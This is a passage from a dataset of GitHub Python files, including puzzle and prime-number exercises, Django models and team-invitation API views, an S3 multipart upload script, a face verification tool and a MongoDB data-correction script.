card_client_2\n","repo_name":"alex-ubbcluj/python","sub_path":"lab-8910/Tests/test_incrementare_puncte_interval_zile_service.py","file_name":"test_incrementare_puncte_interval_zile_service.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32164592460","text":"from collections import deque\n\nnumbers = \"98765\"\nk = 2\nqueue = deque(numbers)\nstack = []\ncnt = 0\n\nstack.append(queue.popleft())\n\nwhile queue and cnt<=k:\n print(stack)\n print(cnt)\n # 담으려는 것\n tmp = queue.popleft()\n while stack and stack[-1] < tmp and cntopen' operation\n# 4) Modified since the last 'file->open' operation\n# 5) Unmodified since the last 'file->save' operation\n# 6) Modified since the last 'file->save' operation\n#\n# The state also enables us to track whether there is already a filename\n# associated with the puzzle; if there is, then \"file->save\" can simply\n# save to the associated file; if there isn't, then \"file->save\" needs to\n# behave like \"file->save as\" (and prompt the user for the filename)\n\nclass PuzzleStateMachine():\n\n # Class variables\n __STATE1 = 1 # Unmodified and never saved to a file (new puzzle board)\n __STATE2 = 2 # Modified, but never saved to a file\n __STATE3 = 3 # Unmodified since the last 'file->open' operation\n __STATE4 = 4 # Modified since the last 'file->open' operation\n __STATE5 = 5 # Unmodified since the last 'file->save' operation\n __STATE6 = 6 # Modified since the last 'file->save' operation\n\n # Initial state: State 1, and no associated filename\n __lastFileName = None\n __state = __STATE1\n\n @classmethod\n # Called when File --> New happens; resets the last saved filename and restores the\n # state to __STATE1\n def reset(cls):\n cls.__state = cls.__STATE1\n cls.__lastFileName = None\n\n @classmethod\n # This should be called after File --> Open has taken place. It sets the state to\n # __STATE3, and also saves the filename associated with the loaded file.\n def fileOpened(cls, fileName):\n cls.__state = cls.__STATE3\n cls.__lastFileName = fileName\n\n @classmethod\n # This should be called after a puzzle board has been saved using the File --> Save As\n # menu item, or after saving an unnamed puzzle board for the first time. It will set\n # the state to __STATE5, and will also save the filename associated with the current\n # puzzle\n def fileSavedAs(cls, fileName):\n cls.__state = cls.__STATE5\n cls.__lastFileName = fileName\n\n @classmethod\n # This should be called anytime the current puzzle board is changed by the user.\n # If the current state is __STATE1, then the new state will be __STATE2.\n # If the current state is __STATE3, then the new state will be __STATE4.\n # If the current state is __STATE5, then the new state will be __STATE6.\n # For any other state, no change will take place (because the state is already set to\n # reflect that the puzzle has been changed)\n def puzzleChanged(cls):\n\n if (cls.__state == cls.__STATE1):\n cls.__state = cls.__STATE2\n elif (cls.__state == cls.__STATE3):\n cls.__state = cls.__STATE4\n elif (cls.__state == cls.__STATE5):\n cls.__state = cls.__STATE6\n\n @classmethod\n # Returns 'True' if the state indicates that the puzzle has changed; otherwise, it\n # returns 'False'\n def hasPuzzleChanged(cls):\n return ((cls.__state == cls.__STATE2) or (cls.__state == cls.__STATE4) or\n (cls. __state == cls.__STATE6))\n\n @classmethod\n # Returns the last file name used while saving or opening a puzzle board. 
The\n # file name may be 'None', if there wasn't yet a save or open request\n def getFileName(cls):\n return(cls.__lastFileName)\n\n","repo_name":"fredtaft/MasyuSolver","sub_path":"PuzzleStateMachine.py","file_name":"PuzzleStateMachine.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25908013046","text":"'''\r\nAuthor:Kalpana Baigar\r\nprogram to check accepted number is prime or not\r\n'''\r\n\r\n#accepting number from user\r\nnum1=\"7\" #takinng input as a sting value\r\nx=int(num1) #converting string type to integer typ\r\nprint(x)\r\nprint(type(x))\r\n\r\ndef prime(num):\r\n \r\n for x in range(2,num): #values in the range of 2 to num-1\r\n if(num%x==0): #if number is divisible\r\n # print(\"not a prime number\") #printing number is prime\r\n return True;\r\n break;\r\n else:\r\n # print(\"prime number\")\r\n return False\r\n\r\niret=prime(x)\r\nif(iret==True):\r\n print(\"not a prime number\") \r\n\r\nelse:\r\n print(\"prime number\")\r\n","repo_name":"baigarkalpana/Python_Numbers","sub_path":"Problems_on_Numbers/prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32480974241","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Member',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('email', models.CharField(max_length=255, db_index=True)),\n ('code_name', models.CharField(max_length=255, db_index=True)),\n ('wish_list', models.TextField()),\n ('member_link', models.UUIDField(default=uuid.uuid4, editable=False)),\n ],\n ),\n migrations.CreateModel(\n name='Organization',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=500, db_index=True)),\n ('org_link', models.UUIDField(default=uuid.uuid4, editable=False)),\n ],\n ),\n migrations.AddField(\n model_name='member',\n name='organization',\n field=models.ForeignKey(related_name='organizations', to='registration.Organization'),\n ),\n migrations.AlterUniqueTogether(\n name='member',\n unique_together=set([('email', 'organization')]),\n ),\n ]\n","repo_name":"juliusmasigan/XmasShuffle","sub_path":"registration/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16886414720","text":"from django.db import models\nimport decimal\n\n# Begin\n# auth:gz\n# create date:7.10\n# description:课程数据库表实体类\n\n# Create your models here.\n\n\nclass Course(models.Model):\n # 课程表\n\n \"\"\"\n type = (\n ('publicBasicCompulsory', '公共基础必修'),\n ('publicBasicElective', '公共基础选修'),\n ('generalEducationCompulsory', '通识教育必修'),\n ('generalEducationElective', '通识教育选修'),\n ('professionalEducationCompulsory', '专业教育必修'),\n ('professionalEducationElective', '专业教育选修'),\n ('publicCompulsory', '公共必修'),\n ('publicElective', '公共选修'),\n ('professionalCompulsory', '专业必修'),\n ('professionalElective', '专业选修'),\n )\n \"\"\"\n\n type = (\n ('社会科学与现代社会', '社会科学与现代社会'),\n ('科学精神与生命关怀', '科学精神与生命关怀'),\n ('艺术体验与审美鉴赏', '艺术体验与审美鉴赏'),\n 
('中华文化与世界文明', '中华文化与世界文明'),\n )\n\n ID = models.AutoField(primary_key=True)\n name = models.CharField(max_length=128)\n type = models.CharField(max_length=128, choices=type)\n teacherName = models.CharField(max_length=128)\n college = models.CharField(max_length=128)\n credit = models.DecimalField(max_digits=2, decimal_places=1, default=0)\n # time = models.CharField(max_length=128)\n # c_time = models.DateTimeField(auto_now_add=True)\n\n # 课程号, 课程名, 课程类别, 授课教师, 授课学院, 课程学分, 学时安排\n def __str__(self):\n return str(self.ID) + ' ' + self.name + ' ' + \\\n self.type + ' ' + self.teacherName + ' ' + \\\n self.college + ' ' + str(self.credit)\n\n class Meta:\n ordering = ['ID']\n verbose_name = '课程'\n verbose_name_plural = '课程'\n\n# End\n","repo_name":"ZhiyuLee/University-public-course-shared-resource-management-platform","sub_path":"UPCSPlatForm/CoursePart/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44428272932","text":"import numpy as np\nfrom ridge import PolynomialRidgeApproximation\n\nfrom pgf import PGF\n\n\nX = np.loadtxt('naca_lhs.input')\nfX = np.loadtxt('naca_lhs.output')\nf_drag = fX[:,0]\nf_lift = fX[:,1]\n\nfor fX, name in zip([f_drag, f_lift], ['drag', 'lift']):\n\tpra = PolynomialRidgeApproximation(subspace_dimension = 1, degree = 5, n_init =10)\n\tpra.fit(X, fX)\n\n\tUX = np.dot(pra.U.T, X.T).flatten()\n\n\tI = np.argsort(UX).flatten()\n\ty = pra.predict(X)\n\n\tpgf = PGF()\n\tpgf.add('UX', UX[I][::10])\n\tpgf.add('y', y[I][::10])\n\tpgf.add('fX', fX[I][::10])\n\tpgf.write('fig_naca_%s_ridge.dat' % name)\n\n\n\tpgf = PGF()\n\tpgf.add('i', np.arange(18))\n\tpgf.add('Ui', pra.U.flatten())\n\n\tpgf.write('fig_naca_%s_ridge_U.dat' % name)\n","repo_name":"jeffrey-hokanson/varproridge","sub_path":"fig_naca_ridge.py","file_name":"fig_naca_ridge.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"14784620814","text":"#Richik Ghosh 110120092\r\n\r\n#IMPORTS\r\nimport math\r\n\r\n#INPUTS\r\n\r\nx = int(input())\r\ny = input()\r\n\r\n#CONSTRAINTS\r\n\r\nif x > 100000 and x < 1:\r\n exit()\r\nif (math.log2(x)).is_integer() == False:\r\n exit()\r\nif y.islower() == False:\r\n exit()\r\nif x != len(y):\r\n exit()\r\n\r\n#MAIN CODE\r\n \r\nif x == 1:\r\n print(0)\r\nelse:\r\n count = 0\r\n while int(x) > 0:\r\n x = x / 2\r\n if y[:int(x)] == y[int(x):int(x*2)]:\r\n count += 1\r\n print(count)\r\n \r\n","repo_name":"Richik19/Spider","sub_path":"Task 1/Spider 1B.py","file_name":"Spider 1B.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34869710256","text":"import hashlib\nimport argparse\nimport pymongo\nimport traceback\nimport logging\nfrom ebi_eva_common_pyutils.config_utils import get_mongo_uri_for_eva_profile\n\n\ndef get_SHA1(variant_rec):\n \"\"\"Calculate the SHA1 digest from the seq, study, contig, start, ref, and alt attributes of the variant\"\"\"\n h = hashlib.sha1()\n keys = ['seq', 'study', 'contig', 'start', 'ref', 'alt']\n h.update('_'.join([str(variant_rec[key]) for key in keys]).encode())\n return h.hexdigest().upper()\n\n\ndef correct(private_config_xml_file, profile='production', mongo_database='eva_accession_sharded'):\n with pymongo.MongoClient(get_mongo_uri_for_eva_profile(profile, private_config_xml_file)) as mongo_handle:\n 
sve_collection = mongo_handle[mongo_database][\"submittedVariantEntity\"]\n filter_criteria = {'seq': 'GCA_002742125.1', 'study': 'PRJEB42582'}\n cursor = sve_collection.find(filter_criteria)\n insert_statements = []\n drop_statements = []\n number_of_variants_to_replace = 10\n total_inserted, total_dropped = 0, 0\n try:\n for variant in cursor:\n original_id = get_SHA1(variant)\n assert variant['_id'] == original_id, \"Original id is different from the one calculated %s != %s\" % (\n variant['_id'], original_id)\n variant['contig'] = 'CM008482.1'\n variant['_id'] = get_SHA1(variant)\n insert_statements.append(pymongo.InsertOne(variant))\n drop_statements.append(pymongo.DeleteOne({'_id': original_id}))\n result_insert = sve_collection.bulk_write(requests=insert_statements, ordered=False)\n total_inserted += result_insert.inserted_count\n result_drop = sve_collection.bulk_write(requests=drop_statements, ordered=False)\n total_dropped += result_drop.deleted_count\n logging.info('%s / %s new documents inserted' % (total_inserted, number_of_variants_to_replace))\n logging.info('%s / %s old documents dropped' % (total_dropped, number_of_variants_to_replace))\n except Exception as e:\n print(traceback.format_exc())\n raise e\n finally:\n cursor.close()\n return total_inserted\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Get stats from variant warehouse', add_help=False)\n parser.add_argument(\"--private-config-xml-file\", help=\"ex: /path/to/eva-maven-settings.xml\", required=True)\n args = parser.parse_args()\n correct(args.private_config_xml_file)\n","repo_name":"EBIvariation/eva-tasks","sub_path":"tasks/eva_2287/correct_contig_with_chr_removed.py","file_name":"correct_contig_with_chr_removed.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73828264835","text":"# Alexander Holmes\n# 9/9/22\n# CRN: 10235\n# CIS 226: Advanced Python Programming\n# TOTAL TIME TO COMPLETE: --- 5 hours ---\n\n'''\nThis program allows the user to use the mygrep utility tool. This tool\nallows us to take in two parameters - the file name, and the string that you\nare searching for. 
The program also prints out only the lines that match in\na given text file.\n\nHow to use\n----------------\nAfter downloading program and having python installed, run the command\nmygrep.py \"String you want to search for\" \"File you want to search in\"\n'''\nimport sys\n\ndef text_in_file(search_text, filename):\n ''' Searches for a given text inside of given filename'''\n # Try to open file, if not found, return error message.\n try:\n target_file = open(filename, \"r\")\n except OSError:\n print(\"File could not be opened/read:\", filename)\n sys.exit()\n\n for line in target_file: # for each line in the file\n if search_text in line: # search for our search text\n print(line.strip(\"\\n\"))\n \n target_file.close()\n\n\ndef main():\n # DONE: Check len(sys.argv) and warn if missing arguments\n \n # The reason why the check below is to 3, is because sys.argv[0] would\n # be the script name, the sys.argv[1] and sys.argv[2] \n # arguments are our search_text and filename respectively\n \n\n if len(sys.argv) < 3 or len(sys.argv) > 3:\n sys.stdout.write(\"Please input only the search inquiry and filename \\n\")\n return\n\n search_text = sys.argv[1]\n filename = sys.argv[2]\n\n text_in_file(search_text,filename)\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"ahalex73/cis-226","sub_path":"week-2-Assignment/mygrep.py","file_name":"mygrep.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74564234753","text":"#!/usr/bin/env python\nimport math, os\nimport boto\nimport boto.s3.connection\nfrom filechunkio import FileChunkIO\n\nCONS_AK = 'ACCESS_KEY'\nCONS_SK = 'SECRET_KEY'\n\n# Connect to S3\nc = boto.connect_s3(\n aws_access_key_id=CONS_AK,\n aws_secret_access_key=CONS_SK,\n host='HOST',\n port=7480,\n is_secure=False,\n calling_format=boto.s3.connection.OrdinaryCallingFormat()\n )\n\n# b = c.get_bucket('mybucket')\nb = c.create_bucket('test-bucket')\n\n# Local file path\nsource_path = './local-large-file'\nsource_size = os.stat(source_path).st_size\n\n# Create a multipart upload request\nmul_key = 'my-multi-obj'\nheader = {\n 'x-amz-meta-joseph': 'Multipart test'\n}\nmp = b.initiate_multipart_upload(mul_key, headers=header)\n\n# Use a chunk size of 20 MiB (feel free to change this)\nchunk_size = 20971520\nchunk_count = int(math.ceil(source_size / float(chunk_size)))\n\n# Send the file parts, using FileChunkIO to create a file-like object\n# that points to a certain byte range within the original file. 
We\n# set bytes to never exceed the original file size.\nfor i in range(chunk_count):\n offset = chunk_size * i\n bytes = min(chunk_size, source_size - offset)\n with FileChunkIO(source_path, 'r', offset=offset,\n bytes=bytes) as fp:\n mp.upload_part_from_file(fp, part_num=i + 1)\n\n# Finish the upload\nmp.complete_upload()\n","repo_name":"atheism/toolkit","sub_path":"s3-usage/python-example/multipart.py","file_name":"multipart.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"44547084915","text":"import os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\r\nfrom mylib import *\r\n\r\ndef main():\r\n getPicture()\r\n images = ['D:/Coding/python/FR/images/newDetection.jpg']\r\n newAligned = facenet2.align_face(images)\r\n newEmbeddings = facenet2.embedding(newAligned)\r\n length,aadharNos,aligned,embeddings = getAllImages()\r\n length += 1\r\n aligned = np.append(aligned,newAligned)\r\n embeddings = np.append(embeddings,newEmbeddings)\r\n aligned = aligned.reshape((length,160,160,3))\r\n embeddings = embeddings.reshape((length,512))\r\n comparisions = facenet2.compare(aligned,embeddings)\r\n # print(aadharNos)\r\n # print(comparisions)\r\n match = ''\r\n flag = True\r\n for i in range(len(comparisions)-1):\r\n if comparisions[i]==1:\r\n match = aadharNos[i]\r\n print('Matched to '+aadharNos[i])\r\n flag = False\r\n break\r\n if flag:\r\n print('No such Face Exist')\r\n else:\r\n getAllInfo(match)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"agrawaljay38/ID_Verification","sub_path":"verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72849508354","text":"import asyncio\nimport os\nfrom datetime import datetime\n\nfrom aiofiles.threadpool import wrap\n\nfrom .base import BaseCollector\n\n\nRAW_DATA_PATH = os.getenv('RAW_DATA_PATH', 'raw_data')\n\n\nclass RawDataCollector(BaseCollector):\n\n output_file = None\n enabled = os.getenv('SAVE_RAW_DATA') == '1'\n\n def __init__(self, consumer):\n super().__init__(consumer)\n if self.enabled:\n self.path = os.path.join(RAW_DATA_PATH, consumer.consumer_id)\n os.mkdir(self.path)\n self._reset_output()\n\n def _reset_output(self):\n previous_output_file = self.output_file\n output_path = os.path.join(self.path, datetime.utcnow().isoformat())\n\n # using synchronous open to avoid race condition\n self.output_file = wrap(open(output_path, mode='bw'), loop=self.loop)\n\n if previous_output_file:\n self.loop.create_task(self._close_output(previous_output_file))\n\n async def _close_output(self, previous_output_file):\n pending_tasks = [task for task in asyncio.all_tasks(self.loop)\n if task._coro.cr_code.co_name == 'save_raw_data']\n if pending_tasks:\n await asyncio.wait(pending_tasks)\n await previous_output_file.close()\n\n async def save_raw_data(self, data):\n await self.output_file.write(data)\n\n def collect_data(self, data):\n self.loop.create_task(self.save_raw_data(data))\n\n def flush(self):\n self._reset_output()\n\n def stop(self):\n self.loop.run_until_complete(self._close_output(self.output_file))\n","repo_name":"Jamim/highload-demo","sub_path":"consumer/collectors/raw_data_collector.py","file_name":"raw_data_collector.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
+{"seq_id":"23587465711","text":"T = int(input())\r\nfor t in range(T):\r\n nc, nj = map(int, input().split())\r\n dc = [list(map(int, input().split())) for n in range(nc)]\r\n dj = [list(map(int, input().split())) for n in range(nj)]\r\n for v in dc: v.append(0)\r\n for v in dj: v.append(1)\r\n data = sorted(dc+dj)\r\n data.append(data[0][:])\r\n data[-1][0] += 1440\r\n data[-1][1] += 1440\r\n gaps = {(0,0): [], (0,1): 0, (1,0): 0, (1,1): []}\r\n total = {0:0, 1:0}\r\n res = 0\r\n for t1, t2 in zip(data, data[1:]):\r\n x = t1[2]\r\n y = t2[2]\r\n total[x] += t2[0] - t1[0]\r\n if x == y:\r\n gaps[(x,x)].append(t2[0] - t1[1]) \r\n else:\r\n gaps[(x,y)] += t2[0] - t1[1]\r\n res += 1\r\n \r\n #print(data) \r\n #print(total) \r\n #print(gaps) \r\n if total[0] > total[1]:\r\n delta = (total[0] - total[1]) // 2\r\n if delta > gaps[(0,1)]:\r\n delta -= gaps[(0,1)]\r\n for v in sorted(gaps[(0,0)], reverse = True):\r\n res += 2\r\n delta -= v\r\n if delta <= 0: break\r\n else: \r\n delta = (total[1] - total[0]) // 2\r\n if delta > gaps[(1,0)]:\r\n delta -= gaps[(1,0)]\r\n for v in sorted(gaps[(1,1)], reverse = True):\r\n res += 2\r\n delta -= v\r\n if delta <= 0: break\r\n print(\"Case #\"+str(t+1)+\":\", res)\r\n ","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_210/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13544789059","text":"from django.shortcuts import get_object_or_404\nfrom django.db.models import Count\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.parsers import MultiPartParser, FormParser\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom account.paginations import CustomPagination\nfrom .paginations import TeamPagination\nfrom .serializers import TeamSerializer, TeamInfoSerializer, UserReceivedInvitationSerializer, \\\n TeamPendingInvitationSerializer, TeamToUserInvitationSerializer, UserToTeamInvitationSerializer\nfrom .models import Team, Invitation, InvitationStatusTypes, InvitationTypes\nfrom .permissions import HasTeam, NoTeam\nfrom account.permissions import ProfileComplete\nfrom constants import TEAM_MAX_MEMBERS\n\n\nclass TeamAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, ]\n serializer_class = TeamSerializer\n queryset = Team.humans.all()\n\n def get(self, request):\n team = request.user.team\n data = self.get_serializer(team).data\n return Response(\n data=data,\n status=status.HTTP_200_OK\n )\n\n def post(self, request):\n team = self.get_serializer(data=request.data)\n team.is_valid(raise_exception=True)\n team.save()\n\n return Response(\n data=team.data,\n status=status.HTTP_201_CREATED\n )\n\n def put(self, request):\n team = self.get_serializer(\n data=request.data,\n instance=request.user.team, partial=True\n )\n team.is_valid(raise_exception=True)\n team.save()\n\n return Response(\n data=team.data,\n status=status.HTTP_201_CREATED\n )\n\n def delete(self, request):\n current_user = request.user\n\n if current_user.team.members.count() == 1:\n current_user.team.delete()\n current_user.team = None\n current_user.save()\n\n return Response(\n status=status.HTTP_204_NO_CONTENT\n )\n\n def get_permissions(self):\n new_permissions = self.permission_classes.copy()\n if self.request.method in ['PUT', 'GET', 'DELETE']:\n new_permissions += [HasTeam]\n if self.request.method 
== 'POST':\n new_permissions += [NoTeam, ProfileComplete]\n return [permission() for permission in new_permissions]\n\n\nclass TeamSearchAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, ]\n serializer_class = TeamSerializer\n queryset = Team.humans.all()\n pagination_class = CustomPagination\n\n def get(self, request):\n term = request.GET.get('search')\n if term is None or term == '':\n return Response(\n data={\"message\": \"Provide search parameter\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n teams = self.get_queryset().filter(name__icontains=term)\n page = self.paginate_queryset(teams)\n results = self.get_serializer(page, many=True).data\n\n return self.get_paginated_response(\n data=results\n )\n\n\nclass TeamInfoAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated]\n serializer_class = TeamInfoSerializer\n queryset = Team.humans.all()\n\n def get(self, request, team_id):\n team = get_object_or_404(Team, id=team_id)\n data = self.get_serializer(instance=team).data\n\n return Response(\n data=data,\n status=status.HTTP_200_OK\n )\n\n\nclass IncompleteTeamInfoListAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, ]\n serializer_class = TeamInfoSerializer\n pagination_class = CustomPagination\n\n def get(self, request):\n incomplete_teams = self.get_queryset()\n page = self.paginate_queryset(incomplete_teams)\n data = self.get_serializer(instance=page, many=True).data\n\n return self.get_paginated_response(\n data=data\n )\n\n def get_queryset(self):\n queryset = Team.humans.annotate(\n members_count=Count('members')\n ).exclude(\n members_count=TEAM_MAX_MEMBERS\n )\n\n name = self.request.query_params.get('name', '')\n if name:\n queryset = queryset.filter(name__icontains=name)\n\n return queryset\n\n\nclass UserReceivedPendingInvitationListAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, ]\n serializer_class = UserReceivedInvitationSerializer\n queryset = Invitation.objects.all()\n\n def get(self, request):\n invitations = self.get_queryset().filter(\n user=request.user,\n status=InvitationStatusTypes.PENDING,\n type=InvitationTypes.TEAM_TO_USER\n )\n data = self.get_serializer(instance=invitations, many=True).data\n return Response(\n data=data,\n status=status.HTTP_200_OK\n )\n\n\nclass UserReceivedResolvedInvitationListAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, ]\n serializer_class = UserReceivedInvitationSerializer\n queryset = Invitation.objects.all()\n\n def get(self, request):\n invitations = self.get_queryset().filter(\n user=request.user,\n type=InvitationTypes.TEAM_TO_USER\n ).exclude(status=InvitationStatusTypes.PENDING)\n data = self.get_serializer(instance=invitations, many=True).data\n\n return Response(\n data=data,\n status=status.HTTP_200_OK\n )\n\n\nclass TeamPendingInvitationListAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, HasTeam]\n serializer_class = TeamPendingInvitationSerializer\n queryset = Invitation.objects.all()\n\n def get(self, request):\n invitations = self.get_queryset().filter(\n team=request.user.team,\n status=InvitationStatusTypes.PENDING,\n type=InvitationTypes.USER_TO_TEAM\n )\n data = self.get_serializer(instance=invitations, many=True).data\n\n return Response(\n data=data,\n status=status.HTTP_200_OK\n )\n\n\nclass UserAnswerInvitationAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, NoTeam]\n serializer_class = UserReceivedInvitationSerializer\n queryset = Invitation.objects.all()\n\n def put(self, request, 
invitation_id):\n invitation = get_object_or_404(Invitation, id=invitation_id)\n serializer = self.get_serializer(\n instance=invitation,\n data=request.data\n )\n serializer.context['invitation_id'] = invitation_id\n serializer.is_valid(raise_exception=True)\n serializer.save()\n\n if request.query_params.get('answer') == 'yes':\n user = invitation.user\n user.team = invitation.team\n invitation.save()\n user.save()\n if invitation.team.is_complete():\n invitation.team.reject_all_pending_invitations()\n user.reject_all_pending_invites()\n\n return Response(\n data={\"detail\": f\"Invitation is {serializer.data['status']}\"},\n status=status.HTTP_201_CREATED\n )\n\n # def get_serializer_context(self):\n # context = super().get_serializer_context()\n # context['invitation_id'] = self.kwargs['invitation_id']\n # return context\n\n\nclass TeamAnswerInvitationAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, HasTeam]\n serializer_class = TeamPendingInvitationSerializer\n queryset = Invitation.objects.all()\n\n def put(self, request, invitation_id):\n invitation = get_object_or_404(Invitation, id=invitation_id)\n serializer = self.get_serializer(instance=invitation, data=request.data)\n serializer.context['invitation_id'] = invitation_id\n serializer.is_valid(raise_exception=True)\n serializer.save()\n\n if request.query_params.get('answer') == 'yes':\n user = invitation.user\n user.team = invitation.team\n user.save()\n if invitation.team.is_complete():\n invitation.team.reject_all_pending_invitations()\n user.reject_all_pending_invites()\n\n return Response(\n data={\"detail\": f\"Invitation is {serializer.data['status']}\"},\n status=status.HTTP_201_CREATED\n )\n\n # def get_serializer_context(self):\n # context = super().get_serializer_context()\n # context['invitation_id'] = self.kwargs['invitation_id']\n # return context\n\n\nclass TeamSentInvitationListAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, HasTeam, ]\n serializer_class = TeamToUserInvitationSerializer\n queryset = Invitation.objects.all()\n\n def get(self, request):\n invitations = self.get_queryset().filter(\n team=request.user.team,\n type=InvitationTypes.TEAM_TO_USER\n )\n data = self.get_serializer(instance=invitations, many=True).data\n\n return Response(\n data={'data': data},\n status=status.HTTP_200_OK\n )\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n\n return Response(\n data={\"message\": \"your invitation sent\"},\n status=status.HTTP_201_CREATED\n )\n\n\nclass UserSentInvitationListAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, NoTeam]\n serializer_class = UserToTeamInvitationSerializer\n queryset = Invitation.objects.all()\n\n def get(self, request):\n invitations = self.get_queryset().filter(\n user=request.user,\n type=InvitationTypes.USER_TO_TEAM\n ).reverse()\n data = self.get_serializer(instance=invitations, many=True).data\n return Response(\n data={'data': data},\n status=status.HTTP_200_OK\n )\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(\n data={\"message\": \"your invitation sent\"},\n status=status.HTTP_201_CREATED\n )\n\n\nclass AllTeamsAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, ]\n serializer_class = TeamInfoSerializer\n pagination_class = TeamPagination\n queryset = Team.humans.all()\n parser_classes = 
(MultiPartParser, FormParser)\n\n def get(self, request):\n page = self.paginate_queryset(self.get_queryset(request))\n data = self.get_serializer(instance=page, many=True).data\n return self.get_paginated_response(\n data={'data': data}\n )\n\n def get_queryset(self, request):\n name = self.request.query_params.get('name')\n\n queryset = Team.humans.filter(is_finalist=True)\n\n teams_with_final_sublission_ids = [team.id for team in\n filter(lambda\n team: team.has_final_submission(),\n queryset\n )\n ]\n try:\n teams_with_final_sublission_ids.remove(request.user.team.id)\n except ValueError:\n pass\n queryset = queryset.filter(\n id__in=teams_with_final_sublission_ids)\n\n if name:\n queryset = queryset.filter(name__icontains=name)\n\n return queryset\n","repo_name":"SharifAIChallenge/AIC22-Backend","sub_path":"team/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11961083965","text":"from fastapi import status, HTTPException\nfrom fastapi.responses import JSONResponse\nfrom sqlalchemy.orm import sessionmaker\nfrom db.connection import engine\nfrom db.models import Account_book\nfrom datetime import datetime\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n\ndef edit_account_book(no, user_id, amount, date, memo):\n try:\n search = session.query(Account_book).filter_by(no=no, user_id=user_id, status=True).first()\n if not search:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=\"데이터를 찾을 수 없습니다.\")\n\n session.query(Account_book).filter_by(no=no, user_id=user_id, status=True). \\\n update({\"amount\": amount, \"date\": date, \"memo\": memo, \"create_time\": datetime.now()})\n session.commit()\n\n return JSONResponse(status_code=status.HTTP_200_OK, content={\"message\": \"데이터 수정 완료.\"})\n\n except HTTPException as err:\n raise err\n\n except Exception as err:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=str(err))\n\n finally:\n session.close()\n","repo_name":"kimhyongkui/account_book","sub_path":"db/update/account_book.py","file_name":"account_book.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2437141587","text":"QUOTE = \"'\"\n\n\ndef split_quoted(s):\n \"\"\"Split a string with quotes, some possibly escaped, into a list of\n alternating quoted and unquoted segments. 
